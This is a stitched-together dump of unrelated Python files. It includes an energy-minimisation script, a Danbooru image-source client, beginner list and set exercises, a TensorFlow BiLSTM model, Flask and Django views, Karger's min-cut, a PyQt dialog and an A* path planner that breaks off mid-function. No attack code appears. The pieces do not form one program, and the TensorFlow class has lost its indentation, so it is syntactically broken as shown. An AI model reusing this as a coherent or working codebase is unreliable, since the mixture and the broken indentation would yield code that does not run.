        # fix the gauge per RC13, and draw the configuration.
        print('\nUsing Powell')
        fit = opt.minimize(U, start, method='Powell')
        print('Potential Energy at n={}: '.format(n_label), fit.fun)
        print('Number of iterations: ', fit.nit)
        plot_configuration(translate_and_rotate(fit.x), fig_name, title)

    # optimal node location for n = 8
    n8_start = np.array([0.2730989500 , 1.1469629952 , -0.3319578813,
                         -0.4728837298, -0.6223685080, 0.7664213265 ,
                         -0.9666537615, -0.2393056630, -0.1698094248,
                         0.6209419539 , -0.3628130566, 0.7094425990 ,
                         0.8035441992 , 0.1648033307 , -0.2639206823,
                         -0.1784380914, 0.2412141513 , -0.8077599510,
                         0.0639788373 , -0.6647479592, -0.2089132333,
                         -0.1435883576, 0.3362547097 , 0.3064972473 ])
    _minimize_and_plot(n8_start, 8, 'SA7_Figure1', 'Approximate Solution for $n=8$')
    # optimal node location for n = 14, cause 14 is a good number
    n14_start = np.array([-0.4308428681, 0.3011152165, 1.5395345691,
                          0.8907978174, -0.2122748336, -0.7483531248,
                          -0.0007070124, 0.3915249591, -1.1159393395,
                          -0.1087424289, -0.7253352304, -0.9277291378,
                          0.5095512108, -0.9887375564, -0.0113705147,
                          -0.9327094761, -0.0119091729, -0.6060402871,
                          0.6843305554, 0.8181106238, -0.3158498774,
                          0.9980943595, -0.0340672328, 0.3707603801,
                          -0.4435631052, 0.9423569825, -0.2236674601,
                          -0.6182734178, -0.8637379285, 0.0806931785,
                          0.0689765876, -0.4413464656, 0.8779993659,
                          -0.8273192340, 0.1657103512, 0.5084348730,
                          0.1775943569, 0.6815230386, 0.6887760023,
                          0.0328126550, -0.0229327514, -0.1172486273])
    _minimize_and_plot(n14_start, 14, 'SA7_Figure2', 'Approximate Solution for $n=14$')
    """
    For n=8 nodes, we started with initial conditions for the optimal node locations given
    in the supplied website. After running the Powell optimization method found in the Scipy
    Optimize library, we translated and rotated our points accordingly so that the first point
    would be located at the origin and the second point would be fixed on the z-axis. We found
    that our optimal potential energy of the system is -19.821075, which is considerably close
    to the potential energy of the given configuration, which is -19.821429. For n=14 nodes,
    we carried out the same process, and found our optimal potential energy of the given system
    to be -47.844233, which is also considerable close to potential energy of the given
    configuration, which is -47.845157.
    """
    return
|
from urllib.parse import urlparse
from starline.sources import Source
from starline.sources.common.booru import BooruDataClient
from starline.model import Post, PostFile, PostMeta
from utils import prepare_logger
log = prepare_logger(__name__)
class DanbooruDataClient(BooruDataClient):
    """Low-level HTTP/JSON client for danbooru.donmai.us."""

    DOMAIN = 'danbooru.donmai.us'
    _POST_URL = '/posts/{}'
    _POST_API_URL = '/posts/{}.json'
    _SEARCH_API_URL = '/posts.json?tags={}'
    _LOGIN_URL = '/session/new'

    def __init__(self, login: str, api_key: str, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Credentials used later by login().
        self._login = login
        self._api_key = api_key

    def get_post_id(self, url: str):
        """Extract the post id: the last path segment of a post URL."""
        path = urlparse(url).path
        return path.rpartition('/')[-1]

    def get_post(self, post_id: str):
        """Fetch a post via the base client and decode the JSON payload."""
        raw_response = super().get_post(post_id)
        return self._get_json(raw_response)

    def login(self):
        """POST the stored credentials to the Danbooru session endpoint."""
        payload = {
            'user': self._login,
            'api_key': self._api_key,
            'commit': 'Submit',
        }
        self.session.post(
            self.get_full_url(self._LOGIN_URL),
            headers={'user-agent': 'OhaioPoster'},
            json=payload,
        )
class Danbooru(Source):
    """Danbooru picture source: fetches post JSON and wraps it as a Post."""

    ALIAS = 'dan'
    DATA_CLIENT = DanbooruDataClient

    def get_post(self, post_id: str):
        """Fetch post data via the data client and wrap it in a Post."""
        return self.wrap_picture(super().get_post(post_id))

    def wrap_picture(self, picture_info: dict):
        """Build a Post (file + meta) from Danbooru's raw post JSON."""
        pid = picture_info['id']
        ext = picture_info['file_ext']
        file_part = PostFile(
            name=f"{self.ALIAS}-{pid}.{ext}",
            extension=ext,
            url=picture_info['file_url'],
        )
        meta_part = PostMeta(
            source=self.ALIAS,
            post_id=str(pid),
            url=self.data_client.get_post_url(pid),
            # Tag strings are space-separated lists.
            authors=set(picture_info['tag_string_artist'].split()),
            characters=set(picture_info['tag_string_character'].split()),
            copyright=set(picture_info['tag_string_copyright'].replace('_(series)', '').split()),
            height=picture_info['image_height'],
            width=picture_info['image_width'],
        )
        return Post(file=file_part, meta=meta_part)
|
# Given a sum, find if a pair of list elements adds up to it.
# Naive solution would be to use for loops that would require n^2 time.
# Better: count occurrences once (O(n)), then test each value's complement
# in O(1) -- ~2n time total, at the cost of extra memory.
from collections import Counter

arr_l = [10, 3, 3, -4, -2, 1, 3, 9]
required_sum = 5

# Bug fix vs. the original: the value->value dict lost duplicate counts, so
# x + x == required_sum would be (wrongly) reported even when x occurred only
# once. Counter keeps the multiplicities needed for that check.
counts = Counter(arr_l)
found_sum = 0
for first_number in counts:
    second_number = required_sum - first_number
    if second_number not in counts:
        continue
    # A value paired with itself needs at least two occurrences.
    if second_number == first_number and counts[first_number] < 2:
        continue
    found_sum = 1
    print("({},{}) are present and their sum is equal to required sum {}"
          .format(first_number, second_number, required_sum))
if not found_sum:
    print("No pair exists")
# Demonstrate tuple concatenation with the + operator.
mytuple = ("veena", 25, "arya", 65, 89, "vinu")
urtuple = ("Shamshil", 4563)
# Earlier indexing/slicing experiments, kept for reference:
# print(mytuple)
# print(mytuple[0])
# print(mytuple[1:3])
# print(mytuple[1:])
combined = mytuple + urtuple
print(combined)
# -*- coding: UTF-8 -*-
import tensorflow as tf
import numpy as np
import pprint
class RNN_Model(object):
def __init__(self, config, is_training=True):
self.keep_prob = config.keep_prob
# self.batch_size = tf.Variable(0, dtype=tf.int32, trainable=False)
self.batch_size = config.batch_size
num_step = config.num_step
class_num = config.class_num # normally 4
embed_dim = config.embed_dim
# self._input_data = tf.placeholder(tf.float32, shape=[None, num_step]) # n_input = embed_dim ?
self._input_data = tf.placeholder(tf.float32, shape=[None, num_step, embed_dim])
# self._targets = tf.placeholder(tf.int64, shape=[None, class_num])
self._targets = tf.placeholder(tf.int64, shape=[None])
self.mask_x = tf.placeholder(tf.float32, [num_step, None])
hidden_neural_size = config.hidden_neural_size
vocabulary_size = config.vocabulary_size
hidden_layer_num = config.hidden_layer_num
# self.new_batch_size = tf.placeholder(tf.int32, shape=[], name="new_batch_size")
# self._batch_size_update = tf.assign(self.batch_size, self.new_batch_size)
# build LSTM network
# lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(hidden_neural_size, forget_bias=0.0, state_is_tuple=True)
# if self.keep_prob < 1:
# lstm_cell = tf.nn.rnn_cell.DropoutWrapper(
# lstm_cell,
# output_keep_prob=self.keep_prob
# )
# cell = tf.nn.rnn_cell.MultiRNNCell([lstm_cell] * hidden_layer_num, state_is_tuple=True)
# # self._initial_state = cell.zero_state(self.batch_size.read_value(), dtype=tf.float32)
# self._initial_state = cell.zero_state(self.batch_size, dtype=tf.float32)
# BiLSTM
lstm_fw = tf.nn.rnn_cell.BasicLSTMCell(hidden_neural_size, forget_bias=1.0, state_is_tuple=True)
lstm_bw = tf.nn.rnn_cell.BasicLSTMCell(hidden_neural_size, forget_bias=1.0, state_is_tuple=True)
if self.keep_prob < 1:
lstm_fw = tf.nn.rnn_cell.DropoutWrapper(
lstm_fw,
output_keep_prob=self.keep_prob
)
lstm_bw = tf.nn.rnn_cell.DropoutWrapper(
lstm_bw,
output_keep_prob=self.keep_prob
)
cell_fw = tf.nn.rnn_cell.MultiRNNCell([lstm_fw] * hidden_layer_num, state_is_tuple=True)
cell_bw = tf.nn.rnn_cell.MultiRNNCell([lstm_bw] * hidden_layer_num, state_is_tuple=True)
self.initial_state_fw = cell_fw.zero_state(self.batch_size, dtype=tf.float32)
self.initial_state_bw = cell_bw.zero_state(self.batch_size, dtype=tf.float32)
# embedding layer
# with tf.device("/cpu:0"), tf.name_scope("embedding_layer"):
# embedding = tf.get_variable("embedding", [vocabulary_size, embed_dim], dtype=tf.float32)
# inputs = tf.nn.embedding_lookup(embedding, self._input_data)
inputs = self._input_data
if self.keep_prob < 1:
inputs = tf.nn.dropout(inputs, self.keep_prob)
# out_put = []
# state = self._initial_state
# out_put_fw = []
# out_put_bw = []
state_fw = self.initial_state_fw
state_bw = self.initial_state_bw
with tf.variable_scope("LSTM_layer"):
# for time_step in range(num_step):
# if time_step > 0:
# tf.get_variable_scope().reuse_variables()
# (cell_output, state) = cell(inputs[:, time_step, :], state)
# out_put.append(cell_output)
# self._final_state = state
# with tf.variable_scope('fw'):
# for time_step in range(num_step):
# if time_step > 0:
# tf.get_variable_scope().reuse_variables()
# (cell_output_fw, state_fw) = cell_fw(inputs[:, time_step, :], state_fw)
# out_put_fw.append(cell_output_fw)
# self.final_state_fw = state_fw
# with tf.variable_scope('bw'):
# inputs = tf.reverse(inputs, [1])
# for time_step in range(num_step):
# if time_step > 0:
# tf.get_variable_scope().reuse_variables()
# (cell_output_bw, state_bw) = cell_bw(inputs[:, time_step, :], state_bw)
# out_put_bw.append(cell_output_bw)
# self.final_state_bw = state_bw
# out_put_bw = tf.reverse(out_put_bw, [0])
# out_put = tf.concat([out_put_fw, out_put_bw], 2)
# for time_step in range(num_step):
# if time_step > 0:
# tf.get_variable_scope().reuse_variables()
((out_put_fw, out_put_bw), (state_fw, state_bw)) = tf.nn.bidirectional_dynamic_rnn(
cell_fw,
cell_bw,
inputs,
initial_state_fw=state_fw,
initial_state_bw=state_bw
)
out_put = tf.concat([out_put_fw, out_put_bw], 2)
out_put = tf.transpose(out_put, [1, 0, 2])
self.final_state_fw = state_fw
self.final_state_bw = state_bw
out_put = out_put * self.mask_x[:, :, None]
with tf.name_scope("mean_pooling_layer"):
out_put = tf.reduce_sum(out_put, 0) / (tf.reduce_sum(self.mask_x, 0)[:, None])
with tf.name_scope("softmax_layer_and_output"):
# softmax_w = tf.get_variable("softmax_w", [hidden_neural_size, class_num], dtype=tf.float32) # weight
softmax_w = tf.get_variable("softmax_w", [hidden_neural_size * 2, class_num], dtype=tf.float32)
softmax_b = tf.get_variable("softmax_b", [class_num], dtype=tf.float32) # bias
self.logits = tf.matmul(out_put, softmax_w) + softmax_b
with tf.name_scope("loss"):
# self.loss = tf.nn.softmax_cross_entropy_with_logits(logits=self.logits + 1e-10, labels=self._targets) # ont-hot represents class
self.loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.logits + 1e-10, labels=self._targets) # int represents class
self._cost = tf.reduce_mean(self.loss)
with tf.name_scope("accuracy"):
self.prediction = tf.argmax(self.logits, 1)
# correct_prediction = tf.equal(self.prediction, tf.argmax(self._targets, 1))
correct_prediction = tf.equal(self.prediction, self._targets)
self.correct_num = tf.reduce_sum(tf.cast(correct_prediction, tf.float32))
self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32), name="accuracy")
# add summary
loss_summary = tf.summary.scalar("loss", self._cost)
accuracy_summary = tf.summary.scalar("accuracy_summary", self.accuracy)
if not is_training:
return
self.global_step = tf.Variable(0, name="global_step", trainable=False)
self._lr = tf.Variable(0.0, trainable=False)
tvars = tf.trainable_variables()
grads, _ = tf.clip_by_global_norm(tf.gradients(self._cost, tvars), config.max_grad_norm)
# keep track of gradient values and sparsity (optional)
grad_summaries = []
for g, v in zip(grads, tvars):
if g is not None:
grad_hist_summary = tf.summary.histogram("{}/grad/hist".format(v.name), g)
sparsity_summary = tf.summary.scalar("{}/grad/sparsity".format(v.name), tf.nn.zero_fraction(g))
grad_summaries.append(grad_hist_summary)
grad_summaries.append(sparsity_summary)
self.grad_summaries_merged = tf.summary.merge(grad_summaries)
self.summary = tf.summary.merge([loss_summary, accuracy_summary, self.grad_summaries_merged])
optimizer = tf.train.GradientDescentOptimizer(self._lr)
# optimizer.apply_gradients(zip(grad, tvars))
self._train_op = optimizer.apply_gradients(zip(grads, tvars))
self.new_lr = tf.placeholder(tf.float32, shape=[], name="new_learning_rate")
self._lr_update = tf.assign(self._lr, self.new_lr)
def assign_new_lr(self, session, lr_value):
    """Push *lr_value* into the graph's learning-rate variable via the update op."""
    feed = {self.new_lr: lr_value}
    session.run(self._lr_update, feed_dict=feed)
def assign_new_batch_size(self, session, batch_size_value):
    """Feed a new batch size through the batch-size update op.

    NOTE(review): ``self._batch_size_update`` and ``self.new_batch_size`` are
    not created anywhere in the visible part of this class — presumably they
    are built in the constructor above; confirm they exist before calling.
    """
    session.run(self._batch_size_update, feed_dict={self.new_batch_size: batch_size_value})
def assign_lr(self, session, lr_value):
    """Update the learning-rate variable (duplicate of assign_new_lr, kept for
    backward compatibility with existing callers).
    """
    # BUG FIX: the placeholder created in the constructor is ``self.new_lr``
    # (the same one assign_new_lr feeds); ``self._new_lr`` is never assigned,
    # so this method raised AttributeError whenever it was called.
    session.run(self._lr_update, feed_dict={self.new_lr: lr_value})
@property
def input_data(self):
    # Read-only accessor for the input placeholder (created in __init__, not shown here).
    return self._input_data
@property
def targets(self):
    # Read-only accessor for the integer class-label placeholder.
    return self._targets
# @property
# def initial_state(self):
# return self._initial_state
@property
def cost(self):
    # Read-only accessor for the mean cross-entropy loss tensor.
    return self._cost
# @property
# def final_state(self):
# return self._final_state
@property
def lr(self):
    # Read-only accessor for the learning-rate variable (set via assign_new_lr).
    return self._lr
@property
def train_op(self):
    # Read-only accessor for the gradient-application training op (train mode only).
    return self._train_op
#!/usr/bin/python3
"""this file stes up a simple flask server """
from flask import Flask, escape, render_template
app = Flask(__name__)
@app.route('/', strict_slashes=False)
def hello_route():
    """Route for the default page: plain-text greeting."""
    # BUG FIX: strict_slashes is an option of app.route(), not a view-function
    # parameter; as a function default it had no effect on routing.
    return ("Hello HBNB!")
@app.route('/hbnb', strict_slashes=False)
def hbnb_route():
    """Route for /hbnb: plain-text page name."""
    # BUG FIX: strict_slashes moved into app.route() where Flask reads it.
    return ("HBNB")
@app.route('/c/<string:text>', strict_slashes=False)
def c_is_fun(text):
    """Route for /c/<text>: display "C " + text with underscores as spaces."""
    # BUG FIX: strict_slashes moved into app.route() where Flask reads it.
    return ("C %s" % text.replace("_", " "))
@app.route('/python/<string:text>', strict_slashes=False)
@app.route('/python/', strict_slashes=False)
@app.route('/python', strict_slashes=False)
def python_is_cool(text='is cool'):
    """Variable rules for /python: "Python " + text, defaulting to "is cool";
    underscores display as spaces.
    """
    # BUG FIX: strict_slashes moved into each app.route() where Flask reads it.
    return ("Python %s" % escape(text.replace("_", " ")))
@app.route('/number/<int:number>', strict_slashes=False)
def is_it_a_number(number):
    """Rules for number variable routing: only matches integer URLs."""
    # BUG FIX: strict_slashes moved into app.route() where Flask reads it.
    return ("%d is a number" % number)
@app.route('/number_template/<int:number>', strict_slashes=False)
def number_template(number):
    """Display an HTML template for a valid integer number."""
    # BUG FIX: strict_slashes moved into app.route() where Flask reads it.
    return render_template('5-number.html', number=number)
@app.route('/number_odd_or_even/<int:number>', strict_slashes=False)
def odd_or_even(number):
    """Display whether the given integer is even or odd via an HTML template."""
    # BUG FIX: strict_slashes moved into app.route() where Flask reads it.
    return render_template(
        '6-number_odd_or_even.html',
        number=number,
        evenodd=("even" if number % 2 == 0 else "odd"))
if __name__ == '__main__':
    # Serve on all interfaces using Flask's default port (5000).
    app.run(host='0.0.0.0')
|
# Find the least missing positive integer in a sorted list that may also
# contain non-positive values (skipped). cnt is the next positive we expect.
lst = [-1, -2, 0, 1, 2, 3, 4]
cnt = 1
for num in lst:
    if num > 0:
        if num == cnt:
            print("hello")
            cnt = cnt + 1
            print(cnt)
        else:
            print(cnt, "is missing integer")
            break
else:
    # BUG FIX: the original reported nothing when every positive 1..k was
    # present (as with this very input, where the answer is 5). When the
    # loop finishes without breaking, the least missing positive is cnt.
    print(cnt, "is missing integer")
|
from django.shortcuts import render, redirect, get_object_or_404
from django.http import HttpResponse, JsonResponse
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.auth.decorators import login_required
from django.contrib.auth.decorators import permission_required
from django.contrib.auth.mixins import PermissionRequiredMixin
# CRUD
from django.views.generic import ListView
from django.views.decorators.csrf import csrf_exempt
from django.urls import reverse_lazy, reverse
# search
from django.db.models import Q
from django.db import IntegrityError
from django.core.exceptions import ObjectDoesNotExist
from app.models import Medication
import json
# LoginRequiredMixin, PermissionRequiredMixin,
# class MedicationList(ListView):
# """ the process profile list page (operation). """
# login_url = '/login/'
# model = Medication
# template_name = 'app/medication/medication_list.html'
# paginate_by = 10
# # permission_required = 'oven.view_process_profile'
#
# def get_context_data(self, *args, **kwargs):
# context = super().get_context_data(*args, **kwargs)
# context['medication'] = Medication.objects.all()
# return context
#
# def get_queryset(self):
# return Medication.objects.all()
def Dashboard(request):
    """Render the dashboard landing page with an empty template context."""
    return render(request, 'app/dashboard/dashboard.html', {})
|
# Tutorial script: set literals, construction, mutation, and set algebra.
farm_animals = {"sheep", "cow", "hen"}
print(farm_animals)
for animal in farm_animals:
    print(animal)
print("="*40)
# set() also accepts any iterable, e.g. a list.
wild_animals = set(["lion", "tiger", "panther"])
print(wild_animals)
for animal in wild_animals:
    print(animal)
print("="*40)
farm_animals.add("horse")
wild_animals.add("elephant")
print()
print(farm_animals)
print(wild_animals)
empty_set = set()
# NOTE: {} creates an empty dict, not an empty set — hence no .add() below.
empty_set_2 = {} # type:ignore
empty_set.add("a")
# empty_set_2.add ("b") Cannot be used in dictionaries
even = set(range(0, 40, 2))
print("Even: ", even)
odd_tuples = (1, 3, 5, 7, 9)
odd = set(odd_tuples)
print("Odd: ", odd)
squares = set([4, 9, 16, 25])
print("Squares: ", squares)
print(even.union(odd))
print("Union:", even.union(squares))
print(f"""Even: {len(even)}
Squares: {len(squares)}
Union: {len(even.union(squares))}""")
print("Difference: ", even.difference(squares))
print("Same: ", even.intersection(squares))
# Functions above return result
# Functions below enforce result on variable
even.intersection_update(squares)
print("Even after intersection: ", even)
print()
print(squares.symmetric_difference(even))
print(even.symmetric_difference(squares))
print()
print(squares.difference(even))
print(even.difference(squares))
# remove() raises KeyError when missing; discard() silently ignores it.
squares.remove(4)
squares.discard(25)
squares.discard(8) # Does not give error
# squares.remove(8) Gives error
print("Squares: ", squares)
even = set(range(0, 40, 2))
print(even)
squares_tuple = (4, 6, 16)
squares = set(squares_tuple)
print(squares)
if squares.issubset(even):
    print("Squares is subset of even")
if squares.issuperset(even):
    print("Squares is superset of even")
# frozenset is an immutable set: hashable, but no add/remove.
frozen_even = frozenset(range(0, 100, 2)) # Cannot be changed
print(frozen_even)
# frozen_even.add(3) Impossible
|
"""a = 2
arr = [1, 2, 3]
cnt = 0
for i in arr:
if a > i:
cnt +=1
arr.insert(cnt, a)
print(arr)
"""
n = int(input())
arr_1 = list(map(int, input().split()))
m = int(input())
arr_2 = list(map(int, input().split()))
for num in arr_1:
cnt = 0
for i in arr_2:
if num > i:
cnt += 1
arr_2.insert(cnt, num)
for i in arr_2:
print(i, end = " ") |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Oct 6 20:17:09 2018
@author: tyler
"""
import numpy as np
import sys
#%%
def karger(G,vertex_label,vertex_degree,size_V):
    """Run Karger's randomized edge-contraction algorithm on a dense multigraph.

    G is a symmetric adjacency-count matrix (mutated in place), vertex_label
    maps each original vertex to its current supervertex, and vertex_degree
    holds current degrees. Contracts until two supervertices remain, then
    returns (smaller side of the cut as original-vertex indices, cut size).
    """
    size_V = len(vertex_label)  # shadows the parameter deliberately
    #N = int(size_V*(1-1/np.sqrt(2)))
    iteration_schedule = [size_V-2]  # contract down to exactly 2 supervertices
    for N in iteration_schedule:
        for n in range(N):
            # if n%1000==0: print('iteration:',n)
            # uniformly at random pick e = (v0,v1)
            # Pick endpoint e0 with probability proportional to its degree,
            # then e1 proportional to edge multiplicity from e0.
            cs0 = np.cumsum(vertex_degree)
            rand_idx0 = np.random.randint(cs0[-1])
            e0 = np.searchsorted(cs0,rand_idx0,side='right')
            #cs1 = np.cumsum(np.append(G[e0,e0:],G[:e0,e0]))
            cs1 = np.cumsum(G[e0])
            rand_idx1 = np.random.randint(vertex_degree[e0])
            e1 = np.searchsorted(cs1,rand_idx1,side='right')
            if(G[e0,e1] == 0):
                print('picked empty edge')  # sanity check; should not happen
            v0 = e0
            v1 = e1
            # bring edges from v1 into v0
            # add new edges to v0
            G[v0] += G[v1]
            G[:,v0] += G[v1]
            new_edge_count = vertex_degree[v1] - G[v0,v0] #- G[v1,v1]
            # delete old edges from v1
            G[v1] = 0
            G[:,v1] = 0
            # delete any created loops
            G[v0,v0] = 0
            # relabel every vertex that pointed at v1 to point at v0
            np.putmask(vertex_label,vertex_label==v1,v0)
            vertex_degree[v0] += new_edge_count
            vertex_degree[v1] = 0
    # Exactly two supervertices should survive; their shared degree is the cut.
    nz = np.nonzero(vertex_degree)[0]
    if(len(nz) != 2):
        print('did not find well defined cut')
    SN0 = np.where(vertex_label == nz[0])[0]
    SN1 = np.where(vertex_label == nz[1])[0]
    if len(SN0) + len(SN1) != size_V:
        print('lost nodes')  # consistency check on the labeling
    if len(SN0) < len(SN1):
        cut = SN0
    else:
        cut = SN1
    return cut,vertex_degree[nz[0]]
#%%
#python p1.py z N ID
z = sys.argv[1] # 0,1,2,3 — selects input file b<z>.in
N = int(sys.argv[2]) # integer number of runs
ID = sys.argv[3] # output file id
#%%
# Build the dense symmetric edge-count matrix from the edge list.
# Vertex ids are shifted so the minimum id becomes 0.
E_raw = np.loadtxt('b'+str(z)+'.in',dtype='int')
min_E = np.min(E_raw)
E = E_raw - min_E
size_V = np.max(E)+1
G = np.zeros((size_V,size_V),dtype='int64')
vertex_degree = np.zeros(size_V,dtype='int64')
for e0,e1 in E:
    vertex_degree[e0] += 1;
    vertex_degree[e1] += 1;
    G[min(e0,e1),max(e0,e1)] += 1;
    G[max(e0,e1),min(e0,e1)] += 1;
vertex_label = np.arange(size_V,dtype='int64') # gives index of supervertex containg vertex
#%%
# Append results of N independent Karger trials to the output files.
f=open('b'+z+'/cuts_'+ID+'.dat','ab')
g=open('b'+z+'/cut_sizes_'+ID+'.dat','ab')
#
for n in range(N):
    if n%500 == 0:
        print(ID+'_trial :', n,' of ',N)
    # Copies keep the pristine graph intact across trials (karger mutates).
    vl,cut_size = karger(np.copy(G),np.copy(vertex_label),np.copy(vertex_degree),size_V)
    np.savetxt(f,[vl],fmt='%d',delimiter=',')
    np.savetxt(g,[cut_size],fmt='%d',delimiter=',')
f.close()
g.close()
|
from app.app import app
from Users.model import checkJWT
from Topics.model import Topics
@app.route('/topics', methods=['GET'])
@checkJWT
def getTopics(userId):
    """Return the topic list; JWT auth is enforced by the checkJWT decorator."""
    topics_model = Topics()
    return topics_model.getTopics()
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'cat_men.ui'
#
# Created by: PyQt5 UI code generator 5.15.0
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Catm(object):
    """pyuic5-generated UI for the category-management dialog: a list widget
    plus Open/New/Delete/Main Menu/Edit buttons. Generated code — regenerate
    from cat_men.ui rather than editing by hand.
    """
    def setupUi(self, Categories):
        # Build and position every widget on the Categories dialog.
        Categories.setObjectName("Categories")
        Categories.resize(605, 381)
        self.clistWidget = QtWidgets.QListWidget(Categories)
        self.clistWidget.setGeometry(QtCore.QRect(10, 20, 431, 291))
        self.clistWidget.setObjectName("clistWidget")
        self.copushButton = QtWidgets.QPushButton(Categories)
        self.copushButton.setGeometry(QtCore.QRect(10, 330, 131, 41))
        font = QtGui.QFont()
        font.setPointSize(11)
        self.copushButton.setFont(font)
        self.copushButton.setObjectName("copushButton")
        self.cnpushButton = QtWidgets.QPushButton(Categories)
        self.cnpushButton.setGeometry(QtCore.QRect(160, 330, 131, 41))
        font = QtGui.QFont()
        font.setPointSize(11)
        self.cnpushButton.setFont(font)
        self.cnpushButton.setObjectName("cnpushButton")
        self.cdpushButton = QtWidgets.QPushButton(Categories)
        self.cdpushButton.setGeometry(QtCore.QRect(310, 330, 131, 41))
        font = QtGui.QFont()
        font.setPointSize(11)
        self.cdpushButton.setFont(font)
        self.cdpushButton.setObjectName("cdpushButton")
        self.cmpushButton = QtWidgets.QPushButton(Categories)
        self.cmpushButton.setGeometry(QtCore.QRect(460, 20, 131, 41))
        font = QtGui.QFont()
        font.setPointSize(11)
        self.cmpushButton.setFont(font)
        self.cmpushButton.setObjectName("cmpushButton")
        self.cepushButton = QtWidgets.QPushButton(Categories)
        self.cepushButton.setGeometry(QtCore.QRect(460, 90, 131, 41))
        font = QtGui.QFont()
        font.setPointSize(11)
        self.cepushButton.setFont(font)
        self.cepushButton.setObjectName("cepushButton")
        self.retranslateUi(Categories)
        QtCore.QMetaObject.connectSlotsByName(Categories)
    def retranslateUi(self, Categories):
        # Apply translatable display strings to the window title and buttons.
        _translate = QtCore.QCoreApplication.translate
        Categories.setWindowTitle(_translate("Categories", "Dialog"))
        self.copushButton.setText(_translate("Categories", "Open"))
        self.cnpushButton.setText(_translate("Categories", "New"))
        self.cdpushButton.setText(_translate("Categories", "Delete"))
        self.cmpushButton.setText(_translate("Categories", "Main Menu"))
        self.cepushButton.setText(_translate("Categories", "Edit"))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 9 19:49:58 2021
@author: jayesh
"""
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 12 08:20:17 2021
@author: jayesh
@teammate: Yoseph Kebede
"""
import numpy as np
import copy
import math
import time
import ast
import cv2
import pygame
import os
from queue import PriorityQueue
#from act_proj3 import actionSet
import matplotlib.pyplot as plt
from matplotlib.patches import Rectangle
#Start and Goal Nodes
s = [] #List storing user input start node
act=[]  # action (rpm pair) sequence recovered along the final path
g = [] #List storing user input goal node
n_list=[]  # curve-segment end points explored (for plotting)
s_list=[]  # curve-segment start points explored (for plotting)
#Obstacle variables
oblist1=[] #List to store the obstacle coordinates for final animation
riglist=set([]) #List to store obstacle with clearance
#Environment variables
xmax=1000 #Width of the map
ymax=1000 #Height of the map
#Child expansion variables
threshold=0.5 #Minimum difference between expanded nodes
visited=[] #List storing visited nodes
visited_nodes = np.zeros((2002,2002,25)) #Matrix storing visited nodes approximated with respect to threshold
#act=actionSet() #Instance of the actionSet class used to perform the child expansion actions
#Cost storing variables
cost2come = np.full((2002,2002,25),np.inf) #Matrix storing cost from start to expanded nodes initialized to infinity
cost2goal = np.full((2002,2002,25),np.inf) #Matrix storing cost from expanded nodes to goal initialized to infinity
totCost = np.full((2002,2002,25),np.inf) #Matrix storing sum of cost to come and cost to goal initialized to infinity
#Backtracking variables
path_track={} #Dictionary storing child nodes to a parent key
path_track1={} #Dictionary storing child nodes to a parent key (per intermediate step)
#Visualization variables
im_count=0
act_track={}  # maps a step point (as str) to the rpm action that produced it
pygame.init() #Initializing Pygame
display_width = 1000 #Frame width
display_height = 1000 #Frame height
gameDisplay = pygame.display.set_mode((display_width,display_height),pygame.SCALED)
pygame.display.set_caption('A* Animation')
black = (0,0,0) #Color representing the background of image
white = (0,255,255) #Color representing the visited nodes
yellow=(255,255,0) #Color representing the obstacles
#Temporary Queue variables
q = PriorityQueue() #Setting a priority queue
def Action(curr_node,ul,ur):
    """Roll a differential-drive robot forward for 1s of simulated time with
    wheel rpms (ul, ur), integrating in dt=0.1 steps from curr_node=[x,y,ang].

    Returns (new_node, accumulated cost, list of step starts, list of step
    ends). Also draws each sub-step on matplotlib and pygame as a side effect.
    """
    a_list=[]  # per-step start points
    b_list=[]  # per-step end points
    x = curr_node[0]
    y = curr_node[1]
    ang=curr_node[2]
    #print('before act',x,y,ang)
    t = 0
    # presumably wheel radius r=3.8 and wheelbase l=35.4 (robot units) —
    # TODO confirm against robot spec
    r = 3.8
    l = 35.4
    #print('rpms',ul,ur)
    dt=0.1
    cost=0
    xs=x
    ys=y
    while t < 1:
        t = t + dt
        if obstaclecheck(x, y)!=True and x<=xmax and y<=ymax and x>=0 and y>=0:
            xs=x
            ys=y
            # standard differential-drive kinematics for one dt step
            dx = 0.5*r * (ul + ur) * math.cos(ang*math.pi/180) * dt
            dy = 0.5*r * (ul + ur) * math.sin(ang*math.pi/180) * dt
            dtheta = (r / l) * (ur - ul) * dt
            dtheta=dtheta*180/math.pi
            ang+= dtheta
            # NOTE(review): the cost term recomputes dx/dy with the *updated*
            # angle, so it is not exactly sqrt(dx^2+dy^2) — confirm intended.
            cost=cost+ math.sqrt(math.pow((0.5*r * (ul + ur) * math.cos(ang*math.pi/180) * dt),2)+math.pow((0.5*r * (ul + ur) * math.sin(ang*math.pi/180) * dt),2))
            x+= dx
            y+= dy
            if obstaclecheck(x, y)!=True and obstaclecheck(xs, ys)!=True and x<=xmax and y<=ymax and x>=0 and y>=0 and xs>0 and ys > 0 and xs<xmax and ys<ymax:
                plt.plot([xs, x], [ys, y], color="red")
                n_list.append([x,y])
                s_list.append([xs,ys])
                a_list.append([xs,ys])
                b_list.append([x,y])
                pygame.event.get()
                pygame.display.flip()
                # pygame y-axis points down; flip with 1000-y
                pygame.draw.rect(gameDisplay, white, [xs,1000-ys,1,1])
                pygame.draw.rect(gameDisplay, white, [x,1000-y,1,1])
        else:
            break
    # normalize heading into [0, 360)
    if ang >= 360 or ang<0:
        ang=ang%360
    new_node = [x,y,int(ang)]
    return new_node,cost,a_list,b_list
#Function run initially to set the obstacle coordinates in the image and append to a list
def getobstaclespace():
    """Enumerate obstacle cells for the 1000x1000 map.

    Returns (oblist1, riglist): oblist1 holds raw obstacle cells for the
    animation; riglist holds str([x, y]) keys of cells inside obstacles
    inflated by robot radius + clearance.
    """
    oblist1=[] #List to store the obstacle coordinates for final animation
    riglist=set([])
    radius=10
    clearance=5
    dist= radius + clearance  # total inflation around each obstacle
    for x in range(0,1001):
